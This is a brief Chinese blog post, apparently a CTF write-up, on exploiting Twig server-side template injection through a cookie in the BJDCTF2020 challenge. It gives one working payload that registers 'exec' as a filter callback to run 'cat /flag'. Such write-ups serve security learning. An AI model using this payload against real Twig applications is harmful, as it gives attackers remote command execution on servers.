[BJDCTF2020]Cookie is so stable 1(twig模板注入)

本文深入探讨了在BJDCTF2020比赛中遇到的一个Cookie中的Twig模板注入漏洞。通过分析包内容,作者发现了两个不同之处,并确认存在SSTI注入。尽管在页面上直接操作无法获取Flag,但通过测试构造了Payload,揭示了过滤机制的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

详解模板注入漏洞
关于SSTI注入的一些理解
抓个包:
请添加图片描述
请添加图片描述
请添加图片描述
请添加图片描述
发现了两个包在cookie上的不同
判断是twig,经过测试发现是ssti注入
Payload:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
请添加图片描述
注释:如果不抓包在页面是无法获得flag的,应该有过滤
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值